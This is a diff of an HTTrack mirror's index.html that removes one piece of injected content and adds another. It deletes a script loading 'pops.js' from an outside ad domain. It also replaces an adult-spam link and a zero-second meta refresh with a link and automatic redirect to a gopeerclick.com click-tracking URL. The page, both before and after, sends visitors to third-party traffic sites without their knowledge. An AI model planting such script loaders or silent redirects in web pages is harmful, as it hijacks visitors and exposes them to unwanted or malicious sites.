--- a/index.html
+++ b/index.html
@@ -98,14 +98,13 @@ h4 { margin: 0;  font-weight: bold;  font-size: 1.18em; }
 	<TITLE>Local index - HTTrack</TITLE>
 </HEAD>
 <BODY>
-	<script>(function(d,a,b){let s=d.createElement('script');s.async=true;s.src='https://olineman.pro/code/pops.js?h=waWQiOjEwNDE5NjQsInNpZCI6MTA0NjYxMSwid2lkIjo4NTMzOCwic3JjIjoyfQ==eyJ&si1='+a+'&si2='+b;d.head.appendChild(s);})(document,'subid1','subid2');</script>
-<H1 ALIGN=Center>Index of locally available sites:</H1>
+	<H1 ALIGN=Center>Index of locally available sites:</H1>
 	<TABLE BORDER="0" WIDTH="100%" CELLSPACING="1" CELLPADDING="0">
 		<TR>
 			<TD BACKGROUND="fade.gif">
 				&middot;
-					<A HREF="mjwwl.ladiestofuck.com/c/da57dc555e50572d8ddf.html">
-						mjwwl.ladiestofuck.com/c/da57dc555e50572d8ddf.html
+					<A HREF="http://3330680564.gopeerclick.com/15GiKa?source={SOURCE_ID}&campaign={CAMPAIGN_ID}&cost={CPC}&external_id={CLICKID}">
+						http://3330680564.gopeerclick.com/15GiKa?source={SOURCE_ID}&campaign={CAMPAIGN_ID}&cost={CPC}&external_id={CLICKID}
 					</A>		
 			</TD>
 		</TR>
@@ -118,7 +117,7 @@ h4 { margin: 0;  font-weight: bold;  font-size: 1.18em; }
 	</H6>
 	<!-- Mirror and index made by HTTrack Website Copier/3.49-2 [XR&CO'2014] -->
 	<!-- Thanks for using HTTrack Website Copier! -->
-	<meta HTTP-EQUIV="Refresh" CONTENT="0; URL=mjwwl.ladiestofuck.com/c/da57dc555e50572d8ddf.html">
+	<meta HTTP-EQUIV="Refresh" CONTENT="0; URL=http://3330680564.gopeerclick.com/15GiKa?source={SOURCE_ID}&campaign={CAMPAIGN_ID}&cost={CPC}&external_id={CLICKID}">
 
 
 <!-- ==================== Start epilogue ==================== -->
